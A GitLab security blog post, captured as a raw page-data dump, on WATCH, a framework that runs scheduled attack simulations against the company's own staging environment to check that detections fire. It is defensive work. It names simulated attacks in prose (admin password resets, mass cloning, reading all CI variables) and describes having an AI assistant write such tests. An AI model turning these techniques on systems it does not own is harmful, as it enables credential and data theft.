[{"data":1,"prerenderedAt":829},["ShallowReactive",2],{"/en-us/blog/automated-detection-testing-framework":3,"navigation-en-us":39,"banner-en-us":460,"footer-en-us":470,"blog-post-authors-en-us-Evan Baltman":712,"blog-related-posts-en-us-automated-detection-testing-framework":727,"blog-promotions-en-us":767,"next-steps-en-us":819},{"id":4,"title":5,"authorSlugs":6,"authors":8,"body":10,"category":11,"categorySlug":11,"config":12,"content":16,"date":20,"description":17,"extension":25,"externalUrl":26,"featured":13,"heroImage":19,"isFeatured":13,"meta":27,"navigation":13,"path":28,"publishedDate":20,"rawbody":29,"seo":30,"slug":15,"stem":34,"tagSlugs":35,"tags":37,"template":14,"updatedDate":26,"__hash__":38},"blogPosts/en-us/blog/automated-detection-testing-framework.yml","Build an automated detection testing framework with GitLab CI/CD and Duo",[7],"evan-baltman",[9],"Evan Baltman","When it comes to managing a healthy alerting system for your security operations center (SOC), tuning false positives is only half the battle. An often overlooked aspect of a healthy alerting system is making sure that critical detections which rarely fire haven’t simply broken completely without anybody noticing.\n\nAt GitLab, the Signals Engineering team tests detections by simulating real malicious behavior on infrastructure we own to validate that our detections fire end-to-end — from the log source, through ingestion, into the SIEM, and all the way through our security orchestration, automation, and response (SOAR) alert routing. This is the approach taken by commercial Breach and Attack Simulation (BAS) tools, but those tools are expensive, generic, and not tailored to our specific detection stack. So we built our own fully automated framework we named Weekly Attack Testing for Continuous Health, or WATCH.\n\nIn this article, you'll learn why we developed this framework, how it works, and how to use it in your environment. \n\n##  A gap in detection validation\n\nWith log schema changes, SIEM updates, pipeline misconfigurations, etc. there are a million ways for your detections to fail silently and only one way for them to fire as expected. When faced with these odds, the conclusion is obvious: “Let’s trigger some old detections\\!” This raises the next question, however, of “How exactly does one trigger detections?” and “How often?”\n\nOne way to trigger detections is through the synthetic approach of reintroducing logs into your SIEM that simulate malicious behavior. Then, you wait to see if your detection rule catches the fake issue and triggers an alert. This approach, aside from failing to prove the detection works in a “real world” scenario, doesn’t validate one of the most error-prone stages of the alert lifecycle, log ingestion (i.e. from log source to SIEM).\n\nWe previously wrote about how our [GitLab Universal Automated Response and Detection (GUARD) system](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/) automates detection creation and deployment through a detections as code (DaC) pipeline and how alerts are routed and triaged through our SOAR. Our DaC pipelines solve the problem of validating that a detection *can deploy* without errors, but it doesn't answer the question of whether that detection will actually *fire* when the behavior it targets occurs in the wild.\n\nWATCH closes that gap. It's the continuous validation layer that gives us confidence that our detections are working.\n\n## How WATCH works\n\nAt a high level, WATCH works by executing scripted attack simulations in our staging environment, and then verifying that the expected alerts propagate through our entire security monitoring stack: our SIEM for detection rules, our SOAR for alert routing, and ultimately the dashboards our team uses to monitor detection health.\n\nThe lifecycle of a WATCH test looks like this:\n\n1. **Scheduling**: Every week, a scheduled GitLab CI/CD pipeline discovers all active tests and distributes them into randomized time slots across the week. Randomization is important; we don't want tests firing at predictable times, which would make it too easy to distinguish test activity from real threats and could mask timing-sensitive issues with our detections.  \n2. **Heads-up notification**: Before a test runs, WATCH notifies our SOAR via a dedicated \"WATCH Heads Up\" story, registering the detections it expects to trigger. This creates trackable records so our SOAR knows what's coming.  \n3. **Execution**: The test runs its simulated malicious behavior. For example, it resets an admin account password or makes suspicious API calls against the staging environment.  \n4. **Detection**: The SIEM processes the activity logs from staging and (hopefully) fires the corresponding detection rules.  \n5. **Correlation**: As alerts arrive in our SOAR, an \"Is this a WATCH Test?\" check determines whether each alert corresponds to a registered test by matching on three factors: the time window between the test run and the alert, the actor identity (IP or username), and the rule ID of the detection that fired. This is what prevents WATCH-generated alerts from being escalated as real incidents to SIRT, while still validating the full pipeline.  \n6. **Verification**: A follow-up pipeline stage checks whether all expected detections fired, updates the detection status metadata, and deploys updated results to our GitLab Pages dashboard. If any detection fails to fire, a notification is sent to our team's Slack channel.\n\n## Using WATCH with GitLab CI/CD\n\nWATCH leverages GitLab CI/CD as its orchestration backbone across three pipeline stages.\n\nThe **schedule_pipelines** stage runs weekly and handles test distribution. It discovers all active tests, bins them into groups, and creates scheduled pipelines set to run at random times throughout the week. Each scheduled pipeline is given a `TESTS_TO_RUN` variable specifying which tests it should execute.\n\nThe **run_tests** stage is where the actual attack simulation happens. It executes the tests assigned to that pipeline run, saves execution statistics to `detection_status.json`, and records SOAR record IDs so alert correlation can happen downstream.\n\nThe **pages** stage handles verification and reporting. It queries our SOAR to confirm that alerts were generated and properly routed, updates detection metadata with the verification results, and deploys the GitLab Pages dashboard with the latest test outcomes.\n\nBelow is a template GitLab CI/CD `gitlab-ci.yml` configuration file for the WATCH pipeline:\n\n```\nspec:\n  inputs:\n    weekly_scheduling:\n      type: boolean\n      default: false\n      description: \"Enable weekly scheduling of detection tests.\"\n    update_pages:\n      type: boolean\n      default: false\n      description: \"For triggering the update of GitLab Pages dashboard.\"\n\n---\n\n# Specify the Docker image to use for the job\nimage: python:3.12\n\nstages:\n  - schedule_pipelines\n  - run_tests\n  - pages\n\n# Job to manage scheduled pipelines (runs when weekly_scheduling input is true)\nmanage_scheduled_pipelines:\n  stage: schedule_pipelines\n  script:\n    - pip install -r requirements.txt\n    - python scripts/manage_scheduled_pipelines.py\n  rules:\n    - if: $TESTS_TO_RUN == null && $CI_PIPELINE_SOURCE == \"schedule\" && [[ inputs.weekly_scheduling ]] == true\n      when: on_success\n    - when: never\n\n# Job to run detection tests, save tines_record_id to detection_status.json, and commit\nrun_detection_tests:\n  stage: run_tests\n  script:\n    - pip install -r requirements.txt\n    - python main.py --prod --save-stats --scheduled-tests\n  rules:\n    - if: $TESTS_TO_RUN\n      when: on_success\n    - when: never\n\n# Job to verify alerts, update detection_status.json, commit, and deploy pages\npages:\n  stage: pages\n  script:\n    - pip install -r requirements.txt\n    - python scripts/verify_and_update_detections.py --tines-api-key ${TINES_API_KEY}\n    - mkdir -p public/data\n    - cp detection_status.json public/data/\n    - cp -r static/* public/\n  pages: true  # Required for GitLab 17.9+ to trigger Pages deployment\n  artifacts:\n    paths:\n      - public\n  rules:\n    - if: $TESTS_TO_RUN == null && [[ inputs.update_pages ]] == true\n      when: on_success\n    - when: never\n```\n\n## How we write tests with GitLab Duo\n\nOne of the design priorities for WATCH was making it easy for anyone on the Signals Engineering or SIRT team to add new tests. The framework provides a `BaseSecurityTest` abstract class that handles all the boilerplate tasks — test ID generation, actor identity management, SOAR coordination — so that test authors only need to focus on three things: setting up the test environment, executing the simulated malicious behavior, and cleaning up afterward.\n\n```py\nclass BaseSecurityTest(ABC):\n\n    def __init__(self, config = {}, test_id: Optional[str] = None):\n        self.test_id = test_id or str(uuid.uuid4())\n        self.test_name = self.__class__.__name__\n        self.expected_detections = {}\n        self.actor_id = config.get('gitlab', {}).get(\n            'default_actor_id',\n            \"sirt_detection_test_user_\" + self.test_id[:8]\n        )\n        self.isActive = True\n        self.test_run_time = 300\n        self.config = config\n\n    @abstractmethod\n    def setup(self) -> bool:\n        \"\"\"Prepare test environment and resources\"\"\"\n\n    @abstractmethod\n    def execute(self) -> Dict[str, Any]:\n        \"\"\"Execute the malicious behavior simulation\"\"\"\n\n    @abstractmethod\n    def cleanup(self) -> bool:\n        \"\"\"Clean up test environment and resources\"\"\"\n```\n\nThe key configuration is the `expected_detections` dictionary, which maps SIEM rule names of the detections we expect to trigger to the actor identity and expected alert arrival time. A new test is just a Python file in the `tests/` directory that subclasses `BaseSecurityTest`, defines its simulated behavior, and declares which detections it expects to trigger. The test runner automatically discovers it on the next scheduled run.\n\nThis low-friction interface matters because detection testing only works as a practice if the team actually writes tests. If adding a test requires understanding the full pipeline internals, nobody will do it. The simple contract to implement setup, execute, and cleanup, and declare your expected detections, also makes WATCH tests a great candidate for [GitLab Duo](https://about.gitlab.com/gitlab-duo/), GitLab's AI assistant. Give Duo the base class and a prompt like “Make me a test that clones lots of projects from a target group” or “Make me a test that accesses all the CI variables in this project using GraphQL,” or even “Rename all these projects to use the same naming scheme.\"\" Duo can then scaffold a working WATCH test that plugs directly into the framework. This lowers the barrier even further: An engineer can go from \"I want to test this detection\" to a running test with Duo doing most of the implementation work.\n\nPro Tip: To make GitLab Duo even more effective, I used [Duo Agent Skills](https://docs.gitlab.com/user/duo_agent_platform/customize/agent_skills/), which is perfect for defining standards and procedures for routine work like writing tests. In our project directory there is a folder called `skills/WATCH-test-creator` with a SKILL.md outlining what a good test looks like, helper functions the test can use, and what the project is for. This file is read immediately after a prompt like the ones above are entered, which makes having to constantly remind Duo what it is you’re doing and how to do it no longer necessary. Most importantly, it makes the results consistent and higher quality! Here is a snippet of that file:\n\n````text\n---\nname: WATCH-test-creator\ndescription: Create WATCH (Orchestrated Offensive Penetration Simulator) security detection tests that simulate malicious behavior on GitLab infrastructure to validate SIEM detection rules and alerting pipelines.\n---\n\n## WATCH Test Creator\n\nYou are an expert at writing security detection tests for the WATCH framework. WATCH tests simulate malicious activities on GitLab-owned infrastructure to verify that the SecOps security monitoring stack (Elastic SIEM, Tines SOAR, alerting rules) properly detects and responds to threats.\n\n### Architecture Overview\n```\nProject Root\n├── core/\n│   ├── base_test.py          # Abstract base class all tests inherit from\n│   ├── test_runner.py         # Auto-discovers and executes tests\n│   └── webhook_manager.py     # Tines/SOAR notification integration\n├── tests/\n│   ├── gitlab/                # GitLab-specific detection tests\n│   └── gcp/                   # GCP-specific detection tests\n├── utils/\n│   ├── gitlab_helper.py       # GitLab API wrapper (users, projects, tokens, webhooks, OAuth)\n│   └── crypto_utils.py        # Password generation utility\n├── config/\n│   ├── settings.py            # Config loader (reads YAML + GITLAB_ADMIN_PAT env var)\n│   └── environments/\n│       ├── dev.yaml           # Local GDK config\n│       └── prod.yaml          # Production staging.gitlab.com config\n├── main.py                    # Entry point with CLI args\n└── detection_status.json      # Test results and detection metadata\n```\n\n````\n\n## Improved visibility through test dashboards\n\n![Test dashboards](https://res.cloudinary.com/about-gitlab-com/image/upload/v1777574679/ylrc96iip682sinfg7zi.png)\n\nWATCH also deploys two interactive dashboards via [GitLab Pages](https://docs.gitlab.com/user/project/pages/) that give the team real-time visibility into detection health.\n\n* The **Detection Status Dashboard** provides an overview of all detection rules and their current test status, including metrics like how many times each detection has fired, its current pass/fail state, and how long the detection has been active. The table is filterable and sortable, so engineers can quickly identify which detections need attention.  \n* The **Test Runs Dashboard** offers a detailed view of individual test executions, grouped by test ID with detection coverage breakdowns. It includes a timeline visualization showing alert propagation times to help us see how long it took from test execution to alert arrival and direct links to the corresponding alerts in our SIEM.\n\nThese dashboards replaced what was previously a manual process of digging through pipeline logs and SIEM queries to understand whether our detections were healthy.\n\nLike the rest of GUARD, WATCH leans heavily on GitLab as its platform:\n\n* **GitLab CI/CD Pipelines and Scheduled Pipelines** orchestrate the entire test lifecycle from weekly scheduling through execution and dashboard deployment.  \n* **Pipeline inputs** allow stages to be triggered independently, so we can re-run just the verification step or just the dashboard update without re-executing all tests.  \n* **CI/CD Variables** securely store the API keys needed for Tines and GitLab staging access.  \n* **GitLab Pages** hosts the WATCH dashboards with zero additional infrastructure, which means no separate hosting to manage, no extra deployment tooling.  \n* Because tests are just Python files in a GitLab project, they benefit from **version control, merge request reviews, and code ownership** the same way our detection rules do through DaC.\n\n## WATCH helps us stay proactive\n\nBuilding WATCH has shifted our team's relationship with detection quality from reactive to proactive. Before WATCH, a broken detection would only surface when an incident occurred and the expected alert was missing; that’s the worst possible time to discover a gap. Now, we get regular updates on the health of our detections and know when they break *before* something actually comes up. This gives peace of mind knowing that as we develop new detections, they won’t be broken and then forgotten.\n\nAnother benefit of WATCH is recording tactics, techniques, and procedures (TTPs) that were used by our red team in performing flash operations. Once we’ve implemented detections and conducted the retroactive analysis of a pentest operation, WATCH can be used to replay the TTPs used to validate these detections. In essence, WATCH makes detection atomic tests replayable TTPs.\n\n## Try WATCH\n\nIf you're running a SOC and relying on SIEM detections to catch threats, the question isn't whether your detections will break, it's whether you'll know when they do. You don't need a commercial BAS platform to start answering that question. A sandbox environment, a CI/CD pipeline, and a framework for scripting attack simulations can get you a long way.\n\nYou can try building your own detection testing framework by signing up for a [free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/).","security-labs",{"featured":13,"template":14,"slug":15},true,"BlogPost","automated-detection-testing-framework",{"title":5,"description":17,"authors":18,"heroImage":19,"date":20,"body":10,"category":11,"tags":21},"Learn how GitLab's Signals Engineering team built the WATCH framework to continuously validate our security monitoring pipeline.",[9],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png","2026-04-30",[22,23,24],"security","security research","features","yml",null,{},"/en-us/blog/automated-detection-testing-framework","seo:\n  config:\n    noIndex: false\n  title: Automate detection testing with GitLab CI/CD and Duo\n  description: Learn how GitLab's Signals Engineering team built the WATCH\n    framework to continuously validate our security monitoring pipeline.\ncontent:\n  title: Build an automated detection testing framework with GitLab CI/CD and Duo\n  description: Learn how GitLab's Signals Engineering team built the WATCH\n    framework to continuously validate our security monitoring pipeline.\n  authors:\n    - Evan Baltman\n  heroImage: https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png\n  date: 2026-04-30\n  body: >-\n    When it comes to managing a healthy alerting system for your security\n    operations center (SOC), tuning false positives is only half the battle. An\n    often overlooked aspect of a healthy alerting system is making sure that\n    critical detections which rarely fire haven’t simply broken completely\n    without anybody noticing.\n\n\n    At GitLab, the Signals Engineering team tests detections by simulating real malicious behavior on infrastructure we own to validate that our detections fire end-to-end — from the log source, through ingestion, into the SIEM, and all the way through our security orchestration, automation, and response (SOAR) alert routing. This is the approach taken by commercial Breach and Attack Simulation (BAS) tools, but those tools are expensive, generic, and not tailored to our specific detection stack. So we built our own fully automated framework we named Weekly Attack Testing for Continuous Health, or WATCH.\n\n\n    In this article, you'll learn why we developed this framework, how it works, and how to use it in your environment. \n\n\n    ##  A gap in detection validation\n\n\n    With log schema changes, SIEM updates, pipeline misconfigurations, etc. there are a million ways for your detections to fail silently and only one way for them to fire as expected. When faced with these odds, the conclusion is obvious: “Let’s trigger some old detections\\!” This raises the next question, however, of “How exactly does one trigger detections?” and “How often?”\n\n\n    One way to trigger detections is through the synthetic approach of reintroducing logs into your SIEM that simulate malicious behavior. Then, you wait to see if your detection rule catches the fake issue and triggers an alert. This approach, aside from failing to prove the detection works in a “real world” scenario, doesn’t validate one of the most error-prone stages of the alert lifecycle, log ingestion (i.e. from log source to SIEM).\n\n\n    We previously wrote about how our [GitLab Universal Automated Response and Detection (GUARD) system](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/) automates detection creation and deployment through a detections as code (DaC) pipeline and how alerts are routed and triaged through our SOAR. Our DaC pipelines solve the problem of validating that a detection *can deploy* without errors, but it doesn't answer the question of whether that detection will actually *fire* when the behavior it targets occurs in the wild.\n\n\n    WATCH closes that gap. It's the continuous validation layer that gives us confidence that our detections are working.\n\n\n    ## How WATCH works\n\n\n    At a high level, WATCH works by executing scripted attack simulations in our staging environment, and then verifying that the expected alerts propagate through our entire security monitoring stack: our SIEM for detection rules, our SOAR for alert routing, and ultimately the dashboards our team uses to monitor detection health.\n\n\n    The lifecycle of a WATCH test looks like this:\n\n\n    1. **Scheduling**: Every week, a scheduled GitLab CI/CD pipeline discovers all active tests and distributes them into randomized time slots across the week. Randomization is important; we don't want tests firing at predictable times, which would make it too easy to distinguish test activity from real threats and could mask timing-sensitive issues with our detections.  \n\n    2. **Heads-up notification**: Before a test runs, WATCH notifies our SOAR via a dedicated \"WATCH Heads Up\" story, registering the detections it expects to trigger. This creates trackable records so our SOAR knows what's coming.  \n\n    3. **Execution**: The test runs its simulated malicious behavior. For example, it resets an admin account password or makes suspicious API calls against the staging environment.  \n\n    4. **Detection**: The SIEM processes the activity logs from staging and (hopefully) fires the corresponding detection rules.  \n\n    5. **Correlation**: As alerts arrive in our SOAR, an \"Is this a WATCH Test?\" check determines whether each alert corresponds to a registered test by matching on three factors: the time window between the test run and the alert, the actor identity (IP or username), and the rule ID of the detection that fired. This is what prevents WATCH-generated alerts from being escalated as real incidents to SIRT, while still validating the full pipeline.  \n\n    6. **Verification**: A follow-up pipeline stage checks whether all expected detections fired, updates the detection status metadata, and deploys updated results to our GitLab Pages dashboard. If any detection fails to fire, a notification is sent to our team's Slack channel.\n\n\n    ## Using WATCH with GitLab CI/CD\n\n\n    WATCH leverages GitLab CI/CD as its orchestration backbone across three pipeline stages.\n\n\n    The **schedule_pipelines** stage runs weekly and handles test distribution. It discovers all active tests, bins them into groups, and creates scheduled pipelines set to run at random times throughout the week. Each scheduled pipeline is given a `TESTS_TO_RUN` variable specifying which tests it should execute.\n\n\n    The **run_tests** stage is where the actual attack simulation happens. It executes the tests assigned to that pipeline run, saves execution statistics to `detection_status.json`, and records SOAR record IDs so alert correlation can happen downstream.\n\n\n    The **pages** stage handles verification and reporting. It queries our SOAR to confirm that alerts were generated and properly routed, updates detection metadata with the verification results, and deploys the GitLab Pages dashboard with the latest test outcomes.\n\n\n    Below is a template GitLab CI/CD `gitlab-ci.yml` configuration file for the WATCH pipeline:\n\n\n    ```\n\n    spec:\n      inputs:\n        weekly_scheduling:\n          type: boolean\n          default: false\n          description: \"Enable weekly scheduling of detection tests.\"\n        update_pages:\n          type: boolean\n          default: false\n          description: \"For triggering the update of GitLab Pages dashboard.\"\n\n    ---\n\n\n    # Specify the Docker image to use for the job\n\n    image: python:3.12\n\n\n    stages:\n      - schedule_pipelines\n      - run_tests\n      - pages\n\n    # Job to manage scheduled pipelines (runs when weekly_scheduling input is true)\n\n    manage_scheduled_pipelines:\n      stage: schedule_pipelines\n      script:\n        - pip install -r requirements.txt\n        - python scripts/manage_scheduled_pipelines.py\n      rules:\n        - if: $TESTS_TO_RUN == null && $CI_PIPELINE_SOURCE == \"schedule\" && [[ inputs.weekly_scheduling ]] == true\n          when: on_success\n        - when: never\n\n    # Job to run detection tests, save tines_record_id to detection_status.json, and commit\n\n    run_detection_tests:\n      stage: run_tests\n      script:\n        - pip install -r requirements.txt\n        - python main.py --prod --save-stats --scheduled-tests\n      rules:\n        - if: $TESTS_TO_RUN\n          when: on_success\n        - when: never\n\n    # Job to verify alerts, update detection_status.json, commit, and deploy pages\n\n    pages:\n      stage: pages\n      script:\n        - pip install -r requirements.txt\n        - python scripts/verify_and_update_detections.py --tines-api-key ${TINES_API_KEY}\n        - mkdir -p public/data\n        - cp detection_status.json public/data/\n        - cp -r static/* public/\n      pages: true  # Required for GitLab 17.9+ to trigger Pages deployment\n      artifacts:\n        paths:\n          - public\n      rules:\n        - if: $TESTS_TO_RUN == null && [[ inputs.update_pages ]] == true\n          when: on_success\n        - when: never\n    ```\n\n\n    ## How we write tests with GitLab Duo\n\n\n    One of the design priorities for WATCH was making it easy for anyone on the Signals Engineering or SIRT team to add new tests. The framework provides a `BaseSecurityTest` abstract class that handles all the boilerplate tasks — test ID generation, actor identity management, SOAR coordination — so that test authors only need to focus on three things: setting up the test environment, executing the simulated malicious behavior, and cleaning up afterward.\n\n\n    ```py\n\n    class BaseSecurityTest(ABC):\n\n        def __init__(self, config = {}, test_id: Optional[str] = None):\n            self.test_id = test_id or str(uuid.uuid4())\n            self.test_name = self.__class__.__name__\n            self.expected_detections = {}\n            self.actor_id = config.get('gitlab', {}).get(\n                'default_actor_id',\n                \"sirt_detection_test_user_\" + self.test_id[:8]\n            )\n            self.isActive = True\n            self.test_run_time = 300\n            self.config = config\n\n        @abstractmethod\n        def setup(self) -> bool:\n            \"\"\"Prepare test environment and resources\"\"\"\n\n        @abstractmethod\n        def execute(self) -> Dict[str, Any]:\n            \"\"\"Execute the malicious behavior simulation\"\"\"\n\n        @abstractmethod\n        def cleanup(self) -> bool:\n            \"\"\"Clean up test environment and resources\"\"\"\n    ```\n\n\n    The key configuration is the `expected_detections` dictionary, which maps SIEM rule names of the detections we expect to trigger to the actor identity and expected alert arrival time. A new test is just a Python file in the `tests/` directory that subclasses `BaseSecurityTest`, defines its simulated behavior, and declares which detections it expects to trigger. The test runner automatically discovers it on the next scheduled run.\n\n\n    This low-friction interface matters because detection testing only works as a practice if the team actually writes tests. If adding a test requires understanding the full pipeline internals, nobody will do it. The simple contract to implement setup, execute, and cleanup, and declare your expected detections, also makes WATCH tests a great candidate for [GitLab Duo](https://about.gitlab.com/gitlab-duo/), GitLab's AI assistant. Give Duo the base class and a prompt like “Make me a test that clones lots of projects from a target group” or “Make me a test that accesses all the CI variables in this project using GraphQL,” or even “Rename all these projects to use the same naming scheme.\"\" Duo can then scaffold a working WATCH test that plugs directly into the framework. This lowers the barrier even further: An engineer can go from \"I want to test this detection\" to a running test with Duo doing most of the implementation work.\n\n\n    Pro Tip: To make GitLab Duo even more effective, I used [Duo Agent Skills](https://docs.gitlab.com/user/duo_agent_platform/customize/agent_skills/), which is perfect for defining standards and procedures for routine work like writing tests. In our project directory there is a folder called `skills/WATCH-test-creator` with a SKILL.md outlining what a good test looks like, helper functions the test can use, and what the project is for. This file is read immediately after a prompt like the ones above are entered, which makes having to constantly remind Duo what it is you’re doing and how to do it no longer necessary. Most importantly, it makes the results consistent and higher quality! Here is a snippet of that file:\n\n\n    ````text\n\n    ---\n\n    name: WATCH-test-creator\n\n    description: Create WATCH (Orchestrated Offensive Penetration Simulator) security detection tests that simulate malicious behavior on GitLab infrastructure to validate SIEM detection rules and alerting pipelines.\n\n    ---\n\n\n    ## WATCH Test Creator\n\n\n    You are an expert at writing security detection tests for the WATCH framework. WATCH tests simulate malicious activities on GitLab-owned infrastructure to verify that the SecOps security monitoring stack (Elastic SIEM, Tines SOAR, alerting rules) properly detects and responds to threats.\n\n\n    ### Architecture Overview\n\n    ```\n\n    Project Root\n\n    ├── core/\n\n    │   ├── base_test.py          # Abstract base class all tests inherit from\n\n    │   ├── test_runner.py         # Auto-discovers and executes tests\n\n    │   └── webhook_manager.py     # Tines/SOAR notification integration\n\n    ├── tests/\n\n    │   ├── gitlab/                # GitLab-specific detection tests\n\n    │   └── gcp/                   # GCP-specific detection tests\n\n    ├── utils/\n\n    │   ├── gitlab_helper.py       # GitLab API wrapper (users, projects, tokens, webhooks, OAuth)\n\n    │   └── crypto_utils.py        # Password generation utility\n\n    ├── config/\n\n    │   ├── settings.py            # Config loader (reads YAML + GITLAB_ADMIN_PAT env var)\n\n    │   └── environments/\n\n    │       ├── dev.yaml           # Local GDK config\n\n    │       └── prod.yaml          # Production staging.gitlab.com config\n\n    ├── main.py                    # Entry point with CLI args\n\n    └── detection_status.json      # Test results and detection metadata\n\n    ```\n\n\n    ````\n\n\n    ## Improved visibility through test dashboards\n\n\n    ![Test dashboards](https://res.cloudinary.com/about-gitlab-com/image/upload/v1777574679/ylrc96iip682sinfg7zi.png)\n\n\n    WATCH also deploys two interactive dashboards via [GitLab Pages](https://docs.gitlab.com/user/project/pages/) that give the team real-time visibility into detection health.\n\n\n    * The **Detection Status Dashboard** provides an overview of all detection rules and their current test status, including metrics like how many times each detection has fired, its current pass/fail state, and how long the detection has been active. The table is filterable and sortable, so engineers can quickly identify which detections need attention.  \n\n    * The **Test Runs Dashboard** offers a detailed view of individual test executions, grouped by test ID with detection coverage breakdowns. It includes a timeline visualization showing alert propagation times to help us see how long it took from test execution to alert arrival and direct links to the corresponding alerts in our SIEM.\n\n\n    These dashboards replaced what was previously a manual process of digging through pipeline logs and SIEM queries to understand whether our detections were healthy.\n\n\n    Like the rest of GUARD, WATCH leans heavily on GitLab as its platform:\n\n\n    * **GitLab CI/CD Pipelines and Scheduled Pipelines** orchestrate the entire test lifecycle from weekly scheduling through execution and dashboard deployment.  \n\n    * **Pipeline inputs** allow stages to be triggered independently, so we can re-run just the verification step or just the dashboard update without re-executing all tests.  \n\n    * **CI/CD Variables** securely store the API keys needed for Tines and GitLab staging access.  \n\n    * **GitLab Pages** hosts the WATCH dashboards with zero additional infrastructure, which means no separate hosting to manage, no extra deployment tooling.  \n\n    * Because tests are just Python files in a GitLab project, they benefit from **version control, merge request reviews, and code ownership** the same way our detection rules do through DaC.\n\n\n    ## WATCH helps us stay proactive\n\n\n    Building WATCH has shifted our team's relationship with detection quality from reactive to proactive. Before WATCH, a broken detection would only surface when an incident occurred and the expected alert was missing; that’s the worst possible time to discover a gap. Now, we get regular updates on the health of our detections and know when they break *before* something actually comes up. This gives peace of mind knowing that as we develop new detections, they won’t be broken and then forgotten.\n\n\n    Another benefit of WATCH is recording tactics, techniques, and procedures (TTPs) that were used by our red team in performing flash operations. Once we’ve implemented detections and conducted the retroactive analysis of a pentest operation, WATCH can be used to replay the TTPs used to validate these detections. In essence, WATCH makes detection atomic tests replayable TTPs.\n\n\n    ## Try WATCH\n\n\n    If you're running a SOC and relying on SIEM detections to catch threats, the question isn't whether your detections will break, it's whether you'll know when they do. You don't need a commercial BAS platform to start answering that question. A sandbox environment, a CI/CD pipeline, and a framework for scripting attack simulations can get you a long way.\n\n\n    You can try building your own detection testing framework by signing up for a [free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/).\n  category: security-labs\n  tags:\n    - security\n    - security research\n    - features\nconfig:\n  featured: true\n  template: BlogPost\n  slug: automated-detection-testing-framework\n",{"config":31,"title":33,"description":17},{"noIndex":32},false,"Automate detection testing with GitLab CI/CD and Duo","en-us/blog/automated-detection-testing-framework",[22,36,24],"security-research",[22,23,24],"UWmElmhGneferKij1y9uz2hzE7yv1Xj3kyPA6edciRw",{"logo":40,"freeTrial":45,"sales":50,"login":55,"items":60,"search":380,"minimal":411,"duo":430,"switchNav":439,"pricingDeployment":450},{"config":41},{"href":42,"dataGaName":43,"dataGaLocation":44},"/","gitlab logo","header",{"text":46,"config":47},"Get free trial",{"href":48,"dataGaName":49,"dataGaLocation":44},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":51,"config":52},"Talk to sales",{"href":53,"dataGaName":54,"dataGaLocation":44},"/sales/","sales",{"text":56,"config":57},"Sign in",{"href":58,"dataGaName":59,"dataGaLocation":44},"https://gitlab.com/users/sign_in/","sign in",[61,90,190,195,299,360],{"text":62,"config":63,"menu":65},"Platform",{"dataNavLevelOne":64},"platform",{"type":66,"columns":67},"cards",[68,74,82],{"title":62,"description":69,"link":70},"The intelligent orchestration platform for DevSecOps",{"text":71,"config":72},"Explore our Platform",{"href":73,"dataGaName":64,"dataGaLocation":44},"/platform/",{"title":75,"description":76,"link":77},"GitLab Duo Agent Platform","Agentic AI for the entire software lifecycle",{"text":78,"config":79},"Meet GitLab Duo",{"href":80,"dataGaName":81,"dataGaLocation":44},"/gitlab-duo-agent-platform/","gitlab duo agent platform",{"title":83,"description":84,"link":85},"Why GitLab","See the top reasons enterprises choose GitLab",{"text":86,"config":87},"Learn more",{"href":88,"dataGaName":89,"dataGaLocation":44},"/why-gitlab/","why gitlab",{"text":91,"left":13,"config":92,"menu":94},"Product",{"dataNavLevelOne":93},"solutions",{"type":95,"link":96,"columns":100,"feature":169},"lists",{"text":97,"config":98},"View all Solutions",{"href":99,"dataGaName":93,"dataGaLocation":44},"/solutions/",[101,125,148],{"title":102,"description":103,"link":104,"items":109},"Automation","CI/CD and automation to accelerate deployment",{"config":105},{"icon":106,"href":107,"dataGaName":108,"dataGaLocation":44},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[110,114,117,121],{"text":111,"config":112},"CI/CD",{"href":113,"dataGaLocation":44,"dataGaName":111},"/solutions/continuous-integration/",{"text":75,"config":115},{"href":80,"dataGaLocation":44,"dataGaName":116},"gitlab duo agent platform - product menu",{"text":118,"config":119},"Source Code Management",{"href":120,"dataGaLocation":44,"dataGaName":118},"/solutions/source-code-management/",{"text":122,"config":123},"Automated Software Delivery",{"href":107,"dataGaLocation":44,"dataGaName":124},"Automated software delivery",{"title":126,"description":127,"link":128,"items":133},"Security","Deliver code faster without compromising security",{"config":129},{"href":130,"dataGaName":131,"dataGaLocation":44,"icon":132},"/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[134,138,143],{"text":135,"config":136},"Application Security Testing",{"href":130,"dataGaName":137,"dataGaLocation":44},"Application security testing",{"text":139,"config":140},"Software Supply Chain Security",{"href":141,"dataGaLocation":44,"dataGaName":142},"/solutions/supply-chain/","Software supply chain security",{"text":144,"config":145},"Software Compliance",{"href":146,"dataGaName":147,"dataGaLocation":44},"/solutions/software-compliance/","software compliance",{"title":149,"link":150,"items":155},"Measurement",{"config":151},{"icon":152,"href":153,"dataGaName":154,"dataGaLocation":44},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[156,160,164],{"text":157,"config":158},"Visibility & Measurement",{"href":153,"dataGaLocation":44,"dataGaName":159},"Visibility and Measurement",{"text":161,"config":162},"Value Stream Management",{"href":163,"dataGaLocation":44,"dataGaName":161},"/solutions/value-stream-management/",{"text":165,"config":166},"Analytics & Insights",{"href":167,"dataGaLocation":44,"dataGaName":168},"/solutions/analytics-and-insights/","Analytics and insights",{"title":170,"type":95,"items":171},"GitLab for",[172,178,184],{"text":173,"config":174},"Enterprise",{"icon":175,"href":176,"dataGaLocation":44,"dataGaName":177},"Building","/enterprise/","enterprise",{"text":179,"config":180},"Small Business",{"icon":181,"href":182,"dataGaLocation":44,"dataGaName":183},"Work","/small-business/","small business",{"text":185,"config":186},"Public Sector",{"icon":187,"href":188,"dataGaLocation":44,"dataGaName":189},"Organization","/solutions/public-sector/","public sector",{"text":191,"config":192},"Pricing",{"href":193,"dataGaName":194,"dataGaLocation":44,"dataNavLevelOne":194},"/pricing/","pricing",{"text":196,"config":197,"menu":199},"Resources",{"dataNavLevelOne":198},"resources",{"type":95,"link":200,"columns":204,"feature":288},{"text":201,"config":202},"View all 